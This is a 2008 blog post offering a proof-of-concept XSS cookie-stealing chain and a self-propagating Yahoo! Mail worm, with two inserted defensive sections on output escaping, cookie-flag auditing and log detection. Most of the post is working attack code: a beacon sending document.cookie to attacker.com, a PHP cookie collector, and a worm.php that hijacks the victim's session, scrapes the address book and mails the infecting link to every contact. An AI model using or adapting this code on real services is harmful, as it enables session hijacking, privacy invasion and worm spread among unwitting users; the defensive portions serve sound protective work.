Wednesday, July 30, 2008

XSS Attack - Yahoo! Worm - Mail PoC

Disclaimer:
This is a PoC and it was created for educational purposes only. The author (me) cannot be held responsible if the PoC doesn't work or is used for other purposes!

1. DESCRIPTION

Using a Cross Site Scripting (XSS) attack gives us the possibility to impersonate a legitimate user (the victim) who is registered on a website (the target).

In this tutorial we will suppose the target site has an XSS vulnerability which allows an attacker to inject "bad code" into a page.

First, let's follow these steps:

a. The victim logs in on the target site
b. The attacker sends the victim a link to a page (with the "bad code") on the target site
c. The victim navigates to the page
d. The page code loads a script from another location which sends the victim's cookies to the attacker
e. The attacker's script uses this cookie to act like the victim on the target site

I'll illustrate now (with examples):

We suppose the victim is already logged in on the target site.

The target has an XSS vulnerability:
Code:
http://www.target.com/page.php?var=


The attacker sends the link to his victim:
Code:
http://www.target.com/page.php?var=

When the victim follows the link, the script "js.js" is loaded and executed by the browser.

===== js.js =====
Code:

new Image().src='http://www.attacker.com/php.php?cookie='+escape(document.cookie);


The file "js.js" contains code which makes a request (carrying the victim's cookie) to the file "php.php", which is controlled by the attacker.

===== php.php =====
Code:

<?php
$domain=".target.com"; // cookie domain
$cookie=$_GET['cookie'];
// we create the cookie file, supposing the session cookie string has several "name=value; " pairs
$hcook=fopen("cookie.txt","w");
$params=explode('; ',$cookie);
for($i=0; $i<count($params); $i++)
{
    $eqpos=strpos($params[$i],"=");
    $name =substr($params[$i],0,$eqpos);
    $value=substr($params[$i],$eqpos+1,strlen($params[$i]));
    // one line per cookie in the Netscape cookie-file format that curl reads (tab-separated fields)
    fwrite($hcook,$domain."\tTRUE\t/\tFALSE\t9999999999\t".$name."\t".$value."\n");
}
fclose($hcook);
// now we can make any curl request using "cookie.txt" as CURLOPT_COOKIEFILE and CURLOPT_COOKIEJAR
?>



The "php.php" file is essential to this kind of attack.

It receives the victim's cookie and uses it to look like the victim on the target site. The reason for using a PHP script instead of JavaScript is to get around the browser's same-origin policy: server-side code can send requests to any domain where the cookie is valid. This way we can receive and send data to the target site and manipulate it in any way we want.
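The chain above only works because of two server-side weaknesses: "page.php" reflects the "var" parameter into the HTML unescaped, and the session cookie is readable from document.cookie. As an added example that is not part of the original post, the Node.js module below shows both fixes: an HTML-escaping function for the reflection point (renderPage is a hypothetical stand-in for page.php) and an audit of Set-Cookie headers that reports cookies missing HttpOnly, Secure or SameSite. The sample headers are constructed, not taken from any real site.

```javascript
// Added example (not from the original post): the two server-side fixes for
// the XSS cookie-theft chain described above.

// 1. Output encoding for the reflected parameter. page.php echoes `var` into
//    HTML; escaping the five significant characters stops a value such as
//    <script src=...></script> from being parsed as markup by the browser.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical hardened equivalent of page.php: builds the page body from the query value.
function renderPage(varParam) {
  return '<p>You searched for: ' + escapeHtml(varParam) + '</p>';
}

// 2. Cookie-attribute audit. document.cookie only exposes cookies that lack
//    HttpOnly, so the beacon `new Image().src = '...?cookie=' + escape(document.cookie)`
//    carries nothing useful when the session cookie is flagged HttpOnly.
// Parses one Set-Cookie header value into name, value and a lower-cased attribute map.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const attributes = {};
  for (const a of attrs) {
    const i = a.indexOf('=');
    const key = (i === -1 ? a : a.slice(0, i)).toLowerCase();
    attributes[key] = i === -1 ? true : a.slice(i + 1);
  }
  return { name: pair.slice(0, eq), value: pair.slice(eq + 1), attributes };
}

// Returns the list of problems for one Set-Cookie header; an empty list means hardened.
function auditSetCookie(header) {
  const c = parseSetCookie(header);
  const problems = [];
  if (!c.attributes.httponly) problems.push('missing HttpOnly: readable via document.cookie');
  if (!c.attributes.secure) problems.push('missing Secure: sent over plain HTTP');
  const sameSite = String(c.attributes.samesite || '').toLowerCase();
  if (sameSite !== 'lax' && sameSite !== 'strict') problems.push('missing or weak SameSite');
  return problems;
}

// Constructed sample headers, in the shape of the ones discussed on this page.
const SAMPLE_HEADERS = [
  'PHPSESSID=abc123; Path=/; Domain=.target.com',                                  // stealable
  'PHPSESSID=abc123; Path=/; Domain=.target.com; Secure; HttpOnly; SameSite=Lax', // hardened
];

function main() {
  // Constructed payload: an external script tag, which the escaping renders inert.
  console.log(renderPage('<script src="//attacker.example/js.js"></script>'));
  for (const h of SAMPLE_HEADERS) console.log(h, '=>', auditSetCookie(h));
}
if (typeof require !== 'undefined' && require.main === module) main();
```

Run with `node` to see the escaped reflection and the audit result for each header; the first header yields three findings, the second none.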

2. YAHOO! MAIL Worm PoC

We will suppose that Yahoo! has an XSS vulnerability of the following form:

"http://xxx.yahoo.com/page?var="

a. The attacker sends the victim an email containing the link http://xxx.yahoo.com/page?var=
b. The victim follows the link (Ok, pause. Let's name the victim BILL)
c. The "worm.php" file steals BILL's cookie and uses it to send a mail to every person in his Address Book
d. The people in BILL's Address Book become victims when they follow the link from the email, which seems to come from a victim they know

===== worm.php =====
Code:

<?php
$subject="Link for you";             // message subject
$message="Look a cool link, CLICK ME!"; // message body
$to=""; $domain=""; $action=""; $crumb="";

// We eliminate the need for a "js.js" file by checking the "cookie" parameter:
// if it doesn't exist we print the content of the "js.js" file,
// and if it exists we continue with the "php.php" logic
if(!isset($_GET['cookie']))
{
    $scripturl="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
    print("new Image().src='".$scripturl."?cookie='+escape(document.cookie);");
}
else
{
    $cookie=$_GET['cookie'];
    // We create a unique name for the file where we'll save the cookie, ensuring this way
    // that when a lot of victims access the script simultaneously the cookies will not overwrite each other
    $cookiefile=rand(100,999).".txt";
    // we create the cookie file
    $hcook=fopen($cookiefile,"w");
    $params=explode('; ',$cookie);
    for($i=0; $i<count($params); $i++)
    {
        $eqpos=strpos($params[$i],"=");
        $name =substr($params[$i],0,$eqpos);
        $value=substr($params[$i],$eqpos+1,strlen($params[$i]));
        fwrite($hcook,".yahoo.com\tTRUE\t/\tFALSE\t9999999999\t".$name."\t".$value."\n");
    }
    fclose($hcook);

    // We query the Yahoo! address book to extract the contacts and build a variable of the form
    // "contact1@yahoo.com,contact2@yahoo.com, etc.." as well as finding the domain us.fXXX.mail.yahoo.com,
    // which changes at each login!
    $address=curl("http://address.mail.yahoo.com/","",$cookiefile);
    if(strpos($address,"Yahoo! Address Book")==true) // if the page was loaded correctly
    {
        $apage=explode("\n",$address);
        foreach($apage as $line_num => $aline)
        {
            if(strstr($aline,"ymsgr:sendIM"))
            {
                $ex =explode("?",$aline);
                $ex2=explode("\"",$ex[1]);
                $id=$ex2[0];
                $to=$to.$ex2[0]."@yahoo.com,";
            }
            if(strstr($aline,"Compose"))
            {
                $ex3=explode("/",$aline);
                $domain="http://".$ex3[2];
            }
        }
    }

    // We load the "Compose" form located on us.fXXX.mail.yahoo.com to find the form's action
    // for sending email and the value of the ".crumb" parameter, which we need for sending messages
    if(strlen($to)>0 && strlen($domain)>0) // if we have the 2 variables
    {
        $compose=curl($domain."/ym/Compose?","",$cookiefile);
        if(strpos($compose,"Yahoo! Mail")==true) // if the page was loaded correctly
        {
            $cpage=explode("\n",$compose);
            foreach($cpage as $line_num => $cline)
            {
                if(strstr($cline,"form name=\"Compose\""))
                {
                    $ex4=explode("\"",$cline);
                    $action=$ex4[5];
                }
                if(strstr($cline,".crumb"))
                {
                    $ex6=explode("\"",$cline);
                    $crumb=$ex6[3];
                }
            }
        }
        if(strlen($action)>0 && strlen($crumb)>0) // if we have the 2 variables
        {
            $subject=str_replace(" ","+",$subject);
            $message=str_replace(" ","+",$message);
            // we generate the POSTFIELDS for curl
            $post ="SEND=1&SD=&SC=&CAN=&docCharset=iso-8859-1&PhotoMailUser=&PhotoToolInstall=&";
            $post.="OpenInsertPhoto=&PhotoGetStart=0&SaveCopy=no&PhotoMailInstallOrigin=&";
            $post.="box=&.crumb=".$crumb."&";
            $post.="FwdFile=&FwdMsg=&FwdSubj=&FwdInline=&OriginalFrom=&OriginalSubject=&";
            $post.="InReplyTo=&NumAtt=0&AttData=&UplData=&OldAttData=&OldUplData=&FName=&";
            $post.="ATT=&VID=&Markers=&NextMarker=0&Thumbnails=&PhotoMailWith=&BrowseState=&";
            $post.="PhotoIcon=&ToolbarState=&VirusReport=&Attachments=&BGRef=&BGDesc=&BGDef=&";
            $post.="BGFg=&BGFF=&BGFS=&BGSolid=&BGCustom=&PlainMsg=&PhotoFrame=&PhotoPrintAtHomeLink=&";
            $post.="PhotoSlideShowLink=&PhotoPrintLink=&PhotoSaveLink=&PhotoPermCap=&PhotoPermPath=&";
            $post.="PhotoDownloadUrl=&PhotoSaveUrl=&PhotoFlags=&start=compose&bmdomain=&hidden=showcc&";
            $post.="showbcc=&AC_Done=&AC_ToList=&AC_CcList=&AC_BccList=&sendtop=Send&";
            $post.="savedrafttop=Save+as+a+Draft&canceltop=Cancel&To=".$to."&Cc=&Bcc=&";
            $post.="Subj=".$subject."&Body=".$message."&Format=html&SigAtt=1&sendbottom=Send&";
            $post.="savedraftbottom=Save+as+a+Draft&cancelbottom=Cancel&";
            // sending the mails
            $mail=curl($domain.$action,$post,$cookiefile);
        }
    }
    unlink($cookiefile);
}

function curl($url,$post='',$cookiefile) // helper to simplify the curl requests
{
    $rand=rand(100000,400000);
    $agent="Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/".$rand." Netscape/7.1 (ax)";
    $ch=curl_init();
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_USERAGENT,$agent);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
    if($post!=='')
    {
        curl_setopt($ch,CURLOPT_POST,1);
        curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
    }
    curl_setopt($ch,CURLOPT_COOKIEFILE,$cookiefile);
    curl_setopt($ch,CURLOPT_COOKIEJAR,$cookiefile);
    curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);
    $result=curl_exec($ch);
    curl_close($ch);
    if($result=="")
    {
        return curl($url,$post,$cookiefile); // retry on an empty response
    }
    else
    {
        return $result;
    }
}
?>
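Both stages of the worm leave a recognisable trace in the target's web-server logs: the link the victim follows carries a script tag pointing at an external host, and the beacon that "worm.php" (or "js.js") triggers is a GET whose "cookie" parameter holds an entire cookie string encoded with JavaScript's escape(). As an added example that is not part of the original post, the Node.js script below runs those two signatures over constructed access-log lines in Common Log Format; the hosts, IPs and cookie values are made up for the demonstration.

```javascript
// Added example (not from the original post): detection logic for the two
// HTTP requests the attack chain above produces, run over constructed
// web-server access-log lines in Common Log Format.

// Decodes the output of JavaScript's legacy escape(): %XX bytes plus %uXXXX
// code units, which decodeURIComponent alone does not understand.
function unescapeLegacy(s) {
  const withUnicode = s.replace(/%u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
  try { return decodeURIComponent(withUnicode); } catch (e) { return withUnicode; }
}

// Pulls client, method, path and query string out of one CLF line; null if it does not parse.
const CLF = /^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) ([^ "]+) HTTP\/[\d.]+" (\d{3}) /;
function parseLogLine(line) {
  const m = CLF.exec(line);
  if (!m) return null;
  const [path, query = ''] = m[3].split('?', 2);
  return { client: m[1], method: m[2], path, query, status: Number(m[4]) };
}

// Looks like a cookie string: at least one "name=value" pair, possibly several joined by "; ".
const COOKIE_PAIRS = /^[^=;\s]+=[^;]*(; [^=;\s]+=[^;]*)*$/;

// Returns the list of detections for one log line (empty when nothing matched).
function classify(line) {
  const req = parseLogLine(line);
  if (!req) return [];
  const findings = [];
  const decodedQuery = unescapeLegacy(req.query);

  // Signature 1: reflected XSS attempt loading a script from another origin
  // (the link the attacker sends, step b above).
  if (/<script[^>]+src\s*=\s*["']?(https?:)?\/\//i.test(decodedQuery)) {
    findings.push('reflected-xss: external script in query');
  }

  // Signature 2: cookie exfiltration beacon (the request php.php / worm.php
  // receives): a parameter whose decoded value is a whole cookie string.
  // Split the raw query first, since escape() encodes '&' inside the value.
  for (const part of req.query.split('&')) {
    const eq = part.indexOf('=');
    if (eq === -1) continue;
    const key = part.slice(0, eq).toLowerCase();
    const value = unescapeLegacy(part.slice(eq + 1));
    if (/cook/.test(key) && COOKIE_PAIRS.test(value)) {
      findings.push('cookie-exfil: ' + key + ' parameter carries ' + value.split('; ').length + ' cookie pair(s)');
    }
  }
  return findings;
}

// Constructed sample log lines (not real traffic).
const SAMPLE_LOG = [
  '203.0.113.5 - - [30/Jul/2008:10:00:01 +0000] "GET /page.php?var=hello HTTP/1.1" 200 512',
  '203.0.113.5 - - [30/Jul/2008:10:00:02 +0000] "GET /page.php?var=%3Cscript%20src%3D%22http://attacker.example/js.js%22%3E%3C/script%3E HTTP/1.1" 200 640',
  '198.51.100.7 - - [30/Jul/2008:10:00:03 +0000] "GET /worm.php?cookie=PHPSESSID%3Dabc123%3B%20Y%3Dv%3D1%26n%3Dx HTTP/1.1" 200 12',
  '198.51.100.7 - - [30/Jul/2008:10:00:04 +0000] "GET /worm.php HTTP/1.1" 200 80',
];

// Returns only the lines that produced at least one finding.
function scan(lines) {
  return lines.map((l) => ({ line: l, findings: classify(l) })).filter((r) => r.findings.length > 0);
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of scan(SAMPLE_LOG)) console.log(r.findings.join('; '), '<-', r.line);
}
```

The second signature keys on the shape of the value rather than on a specific script name, so it also catches the "js.js"-less variant of the worm where the same PHP file serves the beacon script and collects the cookie.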


Thanks for reading and I hope you learned something.
